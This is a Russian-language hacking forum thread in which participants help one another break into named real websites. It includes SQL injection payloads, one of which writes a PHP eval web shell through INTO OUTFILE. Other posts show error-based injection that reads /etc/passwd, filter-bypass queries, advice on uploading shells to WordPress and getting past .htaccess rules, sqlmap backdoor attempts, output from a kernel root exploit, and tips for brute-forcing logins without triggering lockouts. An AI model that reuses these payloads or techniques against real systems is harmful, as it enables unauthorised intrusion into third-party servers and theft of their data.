webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion
2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет(
webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion
Как так, и что делать дальше?


какая ошибка, возможно еррор вектор

BabaDook said:
↑ (https://antichat.live/posts/3946743/)
какая ошибка, возможно еррор вектор


я дам сайт, мне просто из спортивного интереса так сказать)

www.standrewsclubav.ca (http://www.standrewsclubav.ca)

дальше я думаю разберетесь)

PulsarEX547 said:
↑ (https://antichat.live/posts/3946762/)
я дам сайт, мне просто из спортивного интереса так сказать)
www.standrewsclubav.ca (http://www.standrewsclubav.ca)
дальше я думаю разберетесь)


Хз где вы та уязвимость нашли )) максимум раскрытие пути

BabaDook said:
↑ (https://antichat.live/posts/3946794/)
Хз где вы та уязвимость нашли )) максимум раскрытие пути


есть там скуля, только крутится блиндом

Br@!ns said:
↑ (https://antichat.live/posts/3946886/)
есть там скуля, только крутится блиндом


Это я знаю что есть) меня интересует пример запроса, ваншотнуть тут неполучится скорее всего, но хотя бы посмотреть таблицы.... как? Ладно, попробую зайти в Кали, и просканировать через sqlmap.

Br@!ns said:
↑ (https://antichat.live/posts/3946886/)
есть там скуля, только крутится блиндом


ТОЧНО, что-то я туплю.

PulsarEX547 said:
↑ (https://antichat.live/posts/3946903/)
Это я знаю что есть) меня интересует пример запроса, ваншотнуть тут неполучится скорее всего, но хотя бы посмотреть таблицы.... как? Ладно, попробую зайти в Кали, и просканировать через sqlmap.


это слепая, там не будет вывода таблиц, только правда или лож

подскажите как конвертировать список сайтов в список ip адресов?

RWD said:
↑ (https://antichat.live/posts/3947032/)
подскажите как конвертировать список сайтов в список ip адресов?


Первое что приходит в голову - скриптом сделать nslookup к каждому домену.

RWD said:
↑ (https://antichat.live/posts/3947032/)
подскажите как конвертировать список сайтов в список ip адресов?


Вот лови, наговнокодил под скорую руку:


Code:
# -*- coding: utf-8 -*-
import urlparse
import socket

file = open('sites.txt')
wordlist = file.readlines()
col = len(wordlist)
file.close()
for i in range(col):
url = wordlist[i]
parsed = urlparse.urlparse(url)
hostname = parsed.hostname
ipaddress = socket.gethostbyname(hostname)
print (ipaddress)

В файл sites.txt кидаешь URL'ы, ложешь рядом со скриптом и пускаешь. В ответ получишь ip'ишники.

Filipp said:
↑ (https://antichat.live/posts/3947170/)
Вот лови, наговнокодил под скорую руку:

Code:
# -*- coding: utf-8 -*-
import urlparse
import socket

file = open('sites.txt')
wordlist = file.readlines()
col = len(wordlist)
file.close()
for i in range(col):
url = wordlist[i]
parsed = urlparse.urlparse(url)
hostname = parsed.hostname
ipaddress = socket.gethostbyname(hostname)
print (ipaddress)

В файл sites.txt кидаешь URL'ы, ложешь рядом со скриптом и пускаешь. В ответ получишь ip'ишники.


Traceback (most recent call last):

File "", line 5, in

socket.gaierror: [Errno 11001] getaddrinfo failed

вот такая ошибка

RWD said:
↑ (https://antichat.live/posts/3947570/)
Traceback (most recent call last):
File "", line 5, in
socket.gaierror: [Errno 11001] getaddrinfo failed
вот такая ошибка


Хз, я писал под линуксом, все работало. С виртуалки на XP'е проверил, тоже работает. Возможно старая версия python. Я писал под 2.7, скачай нужную версию, последняя 2.7.11.

это из-за того, что адреса не существует. добавьте try except

хай, есть boolean-based blind

при использовании сравнения, то есть

ord(substr(version(),1,1)) > 51

запрос падает

ord(substr(version(),1,1)) = 53

отрабатывает нормально

сам вопрос, в sqlmap'е искал опцию строго сравнения, чтобы он использовал только = вместо >

не в курсе есть такая опция вообще в природе?

SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%SQL%'



Попробовал так:

SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%' AND UNION SELECT * FROM dle_users WHERE 1%'

Как использовать ? Не очень разбираюсь в sql'e

SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%123%' AND UNION SELECT user(),version() FROM information_schema.tables -- %'

/threads/43966/ (https://antichat.live/threads/43966/) - Учитесь разбираться

t0ma5 said:
↑ (https://antichat.live/posts/3948041/)
хай, есть boolean-based blind
при использовании сравнения, то есть
ord(substr(version(),1,1)) > 51
запрос падает
ord(substr(version(),1,1)) = 53
отрабатывает нормально
сам вопрос, в sqlmap'е искал опцию строго сравнения, чтобы он использовал только = вместо >
не в курсе есть такая опция вообще в природе?


утро вечера мудренее)

нашел опцию

--tamper=between

в этом случае sqlmap использует between сравнение вместо

В исходном коде страницы, есть такие строки:

30

50

Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.

BurpSuite, TamperData?

Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


конкретнее опишите, что вы хотите

Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Да , можно.Нет, не бурп сют

Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


ну так откройте отладчик браузера и поменяйте аргумент на 50

далее по событию onclick вызовется change(50)

Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Через Firebug

private_static said:
↑ (https://antichat.live/posts/3948990/)
ну так откройте отладчик браузера и поменяйте аргумент на 50
далее по событию onclick вызовется change(50)


Попробовал. Не всё так просто. Фокус с подменой не удался.

Улыбайся said:
↑ (https://antichat.live/posts/3949317/)
Попробовал. Не всё так просто. Фокус с подменой не удался.


так бля, это локально будет, только для вас и вашего локального веб сервера.

Улыбайся said:
↑ (https://antichat.live/posts/3949317/)
Попробовал. Не всё так просто. Фокус с подменой не удался.


что именно не удалось?

если в change() не отправляется никаких запросов на сервер с проверками то функция должна отрабатывать спокойно

WebDAV remote code execution

Ya tak ponimay cheres headers PUT sozdaetsya file i dannie tuda pishutsya uje sledueshem zaprosom PUT ? Nujnni primeri

Sait na asp , proshu pomoshi

P.S. mogu sozdat' cherez PUT file , s razresheniem .jog i .txt , asp i .asp;.jpg ne razreshaet

Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Кури Wpe pro, копай в сторону charles

Ruslan1993it said:
↑ (https://antichat.live/posts/3949396/)
Кури Wpe pro, копай в сторону charles


Burp Suite это не может делать?

это же все снифферы, почему он должен не позволять?

Запрос: alert(); > Ответ : alert();

Что возможно сделать при таком фильтре ?

Улыбайся said:
↑ (https://antichat.live/posts/3949399/)
Burp Suite это не может делать?


Может, все от тебя зависит, насколько ты этого хочешь, no system is safe!

Хочу залить шелл, нужно знать путь куда залить.

есть доступ к phpinfo ()

там можно узнать необходимый мне путь?

Улыбайся said:
↑ (https://antichat.live/posts/3949737/)
Хочу залить шелл, нужно знать путь куда залить.
есть доступ к phpinfo ()
там можно узнать необходимый мне путь?


Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.

robot.txt

User-Agent: *

Disallow: /public_html/Manage~/

Disallow: /public_html/test/

Disallow: /public_html/config.php

Allow: /

Allow: /public_html/

DOCUMENT_ROOT /home/bomarbg/public_html

[01:45:05] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 6.5

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL 5.0

[01:45:05] [INFO] going to use a web backdoor for command prompt

[01:45:05] [INFO] fingerprinting the back-end DBMS operating system

[01:45:05] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

[01:45:06] [WARNING] unable to retrieve automatically the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: /home/bomarbg/public_html

[01:45:10] [WARNING] unable to automatically parse any web server path

[01:45:10] [INFO] trying to upload the file stager on '/home/bomarbg/public_html/' via LIMIT 'LINES TERMINATED BY' method

[01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'

[01:45:12] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 4 times

[01:45:12] [INFO] fetched data logged to text files under 'C:\Users\.sqlmap\output\'

shutting down at 01:45:12


Konqi said:
↑ (https://antichat.live/posts/3949739/)
Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.



magic_quotes_gpc Off

current user is DBA: True

Могу посмотреть и выводит --users --passwords --privileges --roles --threads=10

Улыбайся said:
↑ (https://antichat.live/posts/3949744/)
[01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'


Прав на запись мб нету?

blackbox said:
↑ (https://antichat.live/posts/3949826/)
Прав на запись мб нету?


Как проверить через sqlmap

Улыбайся said:
↑ (https://antichat.live/posts/3949829/)
Как проверить через sqlmap


Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .

Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.

Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...

Пробуй всякие /images, /temp, /old, /download и т.п.

P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?

Saint-Sky said:
↑ (https://antichat.live/posts/3949840/)
Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .
Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.
Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...
Пробуй всякие /images, /temp, /old, /download и т.п.
P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?


Я хочу залить shell

current user: 'auto12s786@localhost'

database management system users privileges:

%auto12s786% (administrator) [12]:

privilege: CREATE USER

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHUTDOWN

privilege: SUPER

Улыбайся said:
↑ (https://antichat.live/posts/3949845/)
Я хочу залить shell
current user:
'auto12s786@localhost'
database management system users privileges:

%auto12s786%
(administrator) [12]:
privilege: CREATE USER
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHUTDOWN
privilege: SUPER


Файловых привилегий нет!

winstrool said:
↑ (https://antichat.live/posts/3949847/)
Файловых привилегий нет!


тогда когда какой вариант? создать пользователя который сможет? CREATE USER

Улыбайся said:
↑ (https://antichat.live/posts/3949862/)
тогда когда какой вариант? создать пользователя который сможет? CREATE USER


Как вариант попробывать вот эту тему:

https://rdot.org/forum/showthread.php?t=741

но это только лишь читалка...

P.S: Читалку тестировали? load_file()

http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,3,4,5--

Хостер фильтрует "from", чем можно заменить или обойти фильтр?

ArmusIAm said:
↑ (https://antichat.live/posts/3949878/)
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,3,4,5--
Хостер фильтрует "from", чем можно заменить или обойти фильтр?




Code:
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+informatio n_schema.tables

winstrool said:
↑ (https://antichat.live/posts/3949877/)
Как вариант попробывать вот эту тему:
https://rdot.org/forum/showthread.php?t=741
но это только лишь читалка...
P.S: Читалку тестировали?
load_file()


ок гляну.

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы

Br@!ns said:
↑ (https://antichat.live/posts/3950045/)
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы


темплейты, плагины..

Konqi said:
↑ (https://antichat.live/posts/3950184/)
темплейты, плагины..


-

само собой там тоже без прав)

Br@!ns said:
↑ (https://antichat.live/posts/3950294/)
-
само собой там тоже без прав)


Правка .htaccess ?

Установка нового .htaccess в твою папку со своими привилегиями

Br@!ns said:
↑ (https://antichat.live/posts/3950045/)
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы


Все расширения пробовал?

А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...

OxoTnik said:
↑ (https://antichat.live/posts/3950295/)
Правка .htaccess ?
Установка нового .htaccess в твою папку со своими привилегиями


штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)

с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает

Br@!ns said:
↑ (https://antichat.live/posts/3950302/)
штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)
с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает


маловероятно но если правила для того что показывать/выполнять были настроены на nginx'е, то имеет смысл пробрутить соседние ip и посмотреть не висит ли там apache, если в апаче такие махинации с правилами не добавлялись, то шелл отработает прямым запрос на апач

----

вспомнил ещё, иногда поднят на сервере https, порой хост конфиг для nginx тоже другой

Может знает кто, можно в BurpSuite intruder сделать паузы, 10 запросов через 5 минут следующие 10 запросов? На случай если стоит бан, на ввод определенного колличества не правильных комбинаций.

Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов - несколько false-positive а на деле опять таки ничего. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?

Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов для жумлы - несколько false-positive а на деле опять таки ничего, cmsmap попробовал и получил в ответ кучу ошибок, как всегда. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?

blackbox said:
↑ (https://antichat.live/posts/3950541/)
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов для жумлы - несколько false-positive а на деле опять таки ничего, cmsmap попробовал и получил в ответ кучу ошибок, как всегда. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?


Уязвимости плагинов, плохие серверные настройки, ненужные скрипты дырявые.

MaxFast said:
↑ (https://antichat.live/posts/3950640/)
Уязвимости плагинов, плохие серверные настройки, ненужные скрипты дырявые.


Ну я вот сколько движков на скан пускал, там уявзимых плагинов не было. Такое впечатление что сейчас хостеры контролят эту тему. И вообще эти сканеры выдают что-нибудь годное? Только wpscan пока показал себя с лучшей стороны, все остальное либо работает через пень-колоду либо ничего не находит (привет joomscan).

blackbox said:
↑ (https://antichat.live/posts/3950732/)
Ну я вот сколько движков на скан пускал, там уявзимых плагинов не было. Такое впечатление что сейчас хостеры контролят эту тему. И вообще эти сканеры выдают что-нибудь годное? Только wpscan пока показал себя с лучшей стороны, все остальное либо работает через пень-колоду либо ничего не находит (привет joomscan).


Да, joomscan порой выдаёт что-то полезное. Там последнее обновление базы было хрен знаео когда. Забросили же.

MaxFast said:
↑ (https://antichat.live/posts/3950950/)
Да, joomscan порой выдаёт что-то полезное. Там последнее обновление базы было хрен знаео когда. Забросили же.


Мне поэтому и интересно что прошаренные юзают. Вот в своей нише wpscan - отличная тулза, ее и поддерживают до сих пор. А вот у cmsmap задумка масштабная, но реализация НЕ ОЧЕНЬ. Вот и приходится пробовать комбинировать все, но имхо это не совсем то.

http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,'',3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,%27%3C?php%20eval($_GET[cmd]);%20?%3E%27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+INTO+OUTFILE+ %27/var/www/html/platformaonline/template/new/scripturi/shell.php%27+--+)

Что я делаю нетак?

Раскрытие

http://my.moldtelecom.md/scripturi/ajax_login.php?username=

BabaDook said:
↑ (https://antichat.live/posts/3951787/)
на заливку into dumpfile


Та же ошибка можно бодробнее?

kostea said:
↑ (https://antichat.live/posts/3951779/)
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,'',3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,%27%3C?php%20eval($_GET[cmd]);%20?%3E%27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+INTO+OUTFILE+ %27/var/www/html/platformaonline/template/new/scripturi/shell.php%27+--+)
Что я делаю нетак?
Раскрытие
http://my.moldtelecom.md/scripturi/ajax_login.php?username=



Нет прав на запись в папку, судя по всему.

Setrus said:
↑ (https://antichat.live/posts/3951913/)
Нет прав на запись в папку, судя по всему.


Когда нет прав пишет по другому

kostea said:
↑ (https://antichat.live/posts/3951950/)
Когда нет прав пишет по другому


Экранирование

ghost8 said:
↑ (https://antichat.live/posts/3952800/)
Экранирование


Приз в студию

Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

RWD said:
↑ (https://antichat.live/posts/3952852/)
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1


http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=or+1=1+--+

Вы или помогаете или не мусорьте

kostea said:
↑ (https://antichat.live/posts/3952847/)
Приз в студию


приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла

Читай конфиги

ghost8 said:
↑ (https://antichat.live/posts/3952871/)
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги


Пример можно а то читать тоже неполучилось

kostea said:
↑ (https://antichat.live/posts/3953010/)
Пример можно а то читать тоже неполучилось


hex. прочитайте статью по MySQL injection

kostea said:
↑ (https://antichat.live/posts/3953010/)
Пример можно а то читать тоже неполучилось




Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd

ghost8 said:
↑ (https://antichat.live/posts/3953195/)

Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd



http://my.moldtelecom.md/scripturi/...16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,load_file(0x2f6574632f7061 73737764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29+--+)

возврашяет тру но нету вывода

Вектор еррор, вчера тоже тестил

load_file(hex(0x2f6574632f706173737764))

0x2f6574632f706173737764 это /etc/passwd

п.с сам до конца не разобрался

Прочитать файл или что то залить я вижу что не как

Octavian said:
↑ (https://antichat.live/posts/3953440/)
Прочитать файл или что то залить я вижу что не как


Читать можно


PHP:
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20C OUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2 f6574632f706173737764))%20AS%20CHAR),0x2020)),55,5 4)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_S CHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+-

Скажите "Спасибо фазе"

Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?

z0mbie866 said:
↑ (https://antichat.live/posts/3954895/)
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?


Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже...

Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...

Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?

столкнулся с проблемой

рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64

Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff810e8af8

[+] Resolved set_fs_pwd to 0xffffffff810e8a96

[+] Resolved __virt_addr_valid to 0xffffffff8102a87c

[+] Resolved init_task to 0xffffffff816c9020

[+] Resolved init_fs to 0xffffffff816d9900

[+] Resolved default_exec_domain to 0xffffffff816d0660

[+] Resolved bad_file_ops to 0xffffffff81412da0

[+] Resolved bad_file_aio_read to 0xffffffff810dd407

[+] Resolved selinux_enforcing to 0xffffffff8194b968

[+] Resolved selinux_enabled to 0xffffffff8194b964

[+] Resolved security_ops to 0xffffffff8194a110

[+] Resolved default_security_ops to 0xffffffff816dc0b0

[+] Resolved sel_read_enforce to 0xffffffff81134709

[+] Resolved audit_enabled to 0xffffffff81909414

[+] Resolved commit_creds to 0xffffffff81057c93

[+] Resolved prepare_kernel_cred to 0xffffffff81057b8a

[+] Resolved xen_start_info to 0xffffffff81886308

[+] Resolved ptmx_fops to 0xffffffff819564e0

[+] Resolved mark_rodata_ro to 0xffffffff81026458

[+] Resolved set_kernel_text_ro to 0xffffffff81026421

[+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf

[+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b

[-] System rejected creation of perf event.

plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff8111cf7b

[+] Resolved set_fs_pwd to 0xffffffff8111cfda

[+] Resolved __virt_addr_valid to 0xffffffff81030c84

[+] Resolved init_task to 0xffffffff8160d020 (via System.map)

[+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)

[+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map)

[+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)

[+] Resolved bad_file_aio_read to 0xffffffff8110f030

[+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map)

[+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)

[+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)

[+] Resolved security_ops to 0xffffffff817eb370 (via System.map)

[+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)

[+] Resolved sel_read_enforce to 0xffffffff8116cd0f

[+] Resolved audit_enabled to 0xffffffff817b217c (via System.map)

[+] Resolved commit_creds to 0xffffffff8106439e

[+] Resolved prepare_kernel_cred to 0xffffffff81064657

[+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map)

[+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map)

[+] Resolved mark_rodata_ro to 0xffffffff8102dc73

[+] Resolved set_kernel_text_ro to 0xffffffff8102dc41

[+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e

[+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2

[-] System rejected creation of perf event.

z0mbie866 said:
↑ (https://antichat.live/posts/3954937/)
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?


Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п.

Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.

Есть postgres с такими правами


Code:

postgres (administrator) [3]:
privilege: catupd
privilege: createdb
privilege: super



Code:
boolean-based blind
Vector: OR NOT [INFERENCE]

Пробовал это https://rdot.org/forum/showthread.php?t=24

Но не проходит стакед запрос, как можно залиться?

Привет всем!

Наверно банальный вопрос, но все же спрошу, не против если отправите в нужное направление ). OpenVAS показывает уязвимость Format String on HTTP header value на нестандартном порту (8443) веб-сервера для Cisco UCM. Похожая "уязвимость" находится во многих продуктах, не только Cisco. Ниже вывод OpenVAS:

The remote web server seems to be vulnerable to a format string attack

on HTTP 1.0 header value.

An attacker might use this flaw to make it crash or even execute

arbitrary code on this host.

CVSS Base Score: 6.9

Family name: Gain a shell remotely

Category: destructive_attack

Это реально можно как-то использовать?

Ситуация такая. Был у меня давний шелл на одном сайте. Недавно сайт вместе с шеллом перенесли на новый сервер. Итого имеем:

Server software: Apache

Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen,sh ow_source,apache_child_terminate,apache_get_module s,apache_get_version,apache_getenv,apache_note,apa che_setenv,posix_kill,posix_mkfifo,posix_setpgid,p osix_setsid,posix_setuid,posix_getpwuid,posix_unam e,pclose,dl,disk_free_space,diskfreespace,disk_tot al_space,pcntl_exec,proc_close,proc_get_status,pro c_nice,proc_terminate,symlink,link

cURL support: enabled

Supported databases: MySql (5.5.47)

Но это еще не все. Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются.

Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?

Парни, подскажите по одной непростой SQL иньекции:

http://www.profclinic.ru/search/?search_string=[rand]'

Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.

Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).

Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.

Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.

Dr.Strangelove said:
↑ (https://antichat.live/posts/3960248/)
Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются.
Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?


selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.

Грабитель said:
↑ (https://antichat.live/posts/3960673/)
Парни, подскажите по одной непростой SQL иньекции:
http://www.profclinic.ru/search/?search_string=[rand]
'
Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.
Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).
Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.
Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.


Точно там есть уязвимость

http://www.profclinic.ru/search/?search_string (http://www.profclinic.ru/search/?search_string=[rand])=тут передаётся строка, то что вы вбили в поиск на Index.php

BabaDook да действительно... уязвимость есть...

Вопрос мой не об этом. Если сможете помочь найти рабочий вектр раскрутки, очень поможете.

Грабитель said:
↑ (https://antichat.live/posts/3960674/)
selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.


Да! Уже понял, что selinux или apparmor (особенно учитывая что ось убунта). Имеющиеся php-файлы редактировать не могу. Полный запрет на запись php файлов при наличии прав на запись. Перловые скрипты не выполняются. Питон еще конечно попробую, но крайне мало вероятно.

Dr.Strangelove said:
↑ (https://antichat.live/posts/3961004/)
